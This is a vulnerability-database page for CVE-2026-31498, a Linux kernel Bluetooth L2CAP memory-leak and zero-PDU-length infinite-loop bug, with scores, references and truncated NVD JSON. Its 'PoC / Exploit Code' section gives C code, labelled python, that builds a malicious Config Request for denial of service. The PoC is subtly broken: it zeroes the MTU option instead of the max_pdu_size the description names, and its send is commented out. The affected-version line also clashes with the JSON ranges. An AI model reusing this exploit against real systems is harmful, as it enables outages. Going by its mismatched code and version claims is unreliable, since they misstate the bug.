CVE-2026-31498

Description

In the Linux kernel, the following vulnerability has been resolved: Bluetooth: L2CAP: Fix ERTM re-init and zero pdu_len infinite loop l2cap_config_req() processes CONFIG_REQ for channels in BT_CONNECTED state to support L2CAP reconfiguration (e.g. MTU changes). However, since both CONF_INPUT_DONE and CONF_OUTPUT_DONE are already set from the initial configuration, the reconfiguration path falls through to l2cap_ertm_init(), which re-initializes tx_q, srej_q, srej_list, and retrans_list without freeing the previous allocations and sets chan->sdu to NULL without freeing the existing skb. This leaks all previously allocated ERTM resources. Additionally, l2cap_parse_conf_req() does not validate the minimum value of remote_mps derived from the RFC max_pdu_size option. A zero value propagates to l2cap_segment_sdu() where pdu_len becomes zero, causing the while loop to never terminate since len is never decremented, exhausting all available memory. Fix the double-init by skipping l2cap_ertm_init() and l2cap_chan_ready() when the channel is already in BT_CONNECTED state, while still allowing the reconfiguration parameters to be updated through l2cap_parse_conf_req(). Also add a pdu_len zero check in l2cap_segment_sdu() as a safeguard.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE

Linux Kernel < 6.6 (根据Git提交推断)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

/*
 * PoC Concept: Trigger L2CAP Zero PDU Length Infinite Loop
 * This sends a malicious Configuration Request with max_pdu_size set to 0.
 */
#include <bluetooth/bluetooth.h>
#include <bluetooth/l2cap.h>
#include <sys/socket.h>
#include <unistd.h>

int main(int argc, char **argv) {
    int sock;
    struct sockaddr_l2 addr = {0};
    char buf[128];
    
    // Create L2CAP socket
    sock = socket(AF_BLUETOOTH, SOCK_RAW, BTPROTO_L2CAP);
    if (sock < 0) return -1;

    // Bind to local adapter
    addr.l2_family = AF_BLUETOOTH;
    addr.l2_bdaddr = *BDADDR_ANY;
    addr.l2_psm = htobs(0);
    bind(sock, (struct sockaddr *)&addr, sizeof(addr));

    // Construct malicious Config Req (Simplified)
    // Code: 0x04 (Config Req), ID: 1, Len: ...
    // Flags: 0x00, DCID: 0xXXXX
    // Option Type: 0x01 (MTU), Length: 2, Value: 0x0000 (Malicious Zero)
    // Note: Actual kernel space triggering requires specific channel state.
    
    buf[0] = 0x04; // Config Req
    buf[1] = 0x01; // Identifier
    buf[2] = 0x00; // Length (placeholder)
    buf[3] = 0x08; 
    buf[4] = 0x00; // Flags
    buf[5] = 0x40; // DCID (example)
    buf[6] = 0x00;
    
    // Option: MTU set to 0 to trigger zero pdu_len path
    buf[7] = 0x01; // MTU option type
    buf[8] = 0x02; // Length
    buf[9] = 0x00; // MTU Low byte
    buf[10] = 0x00; // MTU High byte
    
    // Send to target (requires target address and connection state)
    // send(sock, buf, 11, 0);
    
    close(sock);
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-31498
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-31498
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-31498/
[4] VulDB https://vuldb.com/cve/CVE-2026-31498
[5] https://git.kernel.org/stable/c/042e2cd4bb11e5313b19b87593616524949e4c52
[6] https://git.kernel.org/stable/c/25f420a0d4cfd61d3d23ec4b9c56d9f443d91377
[7] https://git.kernel.org/stable/c/52667c859fe33f70c2e711cb81bbd505d5eb8e75
[8] https://git.kernel.org/stable/c/900e4db5385ec2cacd372345a80ab9c8e105b3a3
[9] https://git.kernel.org/stable/c/9760b83cfd24b38caee663f429011a0dd6064fa9
[10] https://git.kernel.org/stable/c/9a21a631ee034b1573dce14b572a24943dbfd7ae
[11] https://git.kernel.org/stable/c/de37e2655b7abc3f59254c6b72256840f39fc6d5
[12] https://git.kernel.org/stable/c/e7aab23b7df89a3d754a5f0a7d2237548b328bd0

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-31498", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-04-22T14:16:48.067", "lastModified": "2026-04-28T14:41:39.087", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: L2CAP: Fix ERTM re-init and zero pdu_len infinite loop\n\nl2cap_config_req() processes CONFIG_REQ for channels in BT_CONNECTED\nstate to support L2CAP reconfiguration (e.g. MTU changes). However,\nsince both CONF_INPUT_DONE and CONF_OUTPUT_DONE are already set from\nthe initial configuration, the reconfiguration path falls through to\nl2cap_ertm_init(), which re-initializes tx_q, srej_q, srej_list, and\nretrans_list without freeing the previous allocations and sets\nchan->sdu to NULL without freeing the existing skb. This leaks all\npreviously allocated ERTM resources.\n\nAdditionally, l2cap_parse_conf_req() does not validate the minimum\nvalue of remote_mps derived from the RFC max_pdu_size option. A zero\nvalue propagates to l2cap_segment_sdu() where pdu_len becomes zero,\ncausing the while loop to never terminate since len is never\ndecremented, exhausting all available memory.\n\nFix the double-init by skipping l2cap_ertm_init() and\nl2cap_chan_ready() when the channel is already in BT_CONNECTED state,\nwhile still allowing the reconfiguration parameters to be updated\nthrough l2cap_parse_conf_req(). Also add a pdu_len zero check in\nl2cap_segment_sdu() as a safeguard."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-835"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.4.238", "versionEndExcluding": "4.5", "matchCriteriaId": "06D736F2-3AF9-405C-A2D4-D7A433966CD1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.9.238", "versionEndExcluding": "4.10", "matchCriteriaId": "C239C4E4-A9BE-4BA4-B0ED-58C96D32A965"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.14.200", "versionEndExcluding": "4.15", "matchCriteriaId": "E4C219D0-2F4C-4842-85C7-5EE4D0099F82"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.19.149", "versionEndExcluding": "4.20", "matchCriteriaId": "22D98FED-AEF1-4722-8A24-E84AEFBAE267"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.4.69", "versionEndExcluding": "5.5", "matchCriteriaId": "20BCB29D-C30A-4880-8FC2-2468E283C95D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.7.1", "versionEndExcluding": "5.10.253", "matchCriteriaId": "44827F4D-4242-412D-B59A-6D9F5FC547B1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.203", "matchCriteriaId": "20DDB3E9-AABF-4107-ADB0-5362AA067045"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.168", "matchCriteriaId": "E2DDDCA1-6DAB-4018-B920-8F045DDD8D3B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.131", "matchCriteriaId": "CE6ED4D4-0046-4573-BFA9-D64143B6A89F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.80", "matchCriteriaId": "97EB19EC-A11E-49C6-9D2F-6F6EC6CB98B6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.21", "matchCriteriaId": "ED39847A-3B46-4729-B7CA-B2C30B9FA8FE"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.11", "matchCriteriaId": "4CA2E747-A9EC-4518-9AA2-B4247FC748B7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:5.7:-:*:*:*:*:*:*", "matchCriteriaId": "3D23CE42-BDB2-4216-8495-230ABE98FCDD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16" ... (truncated)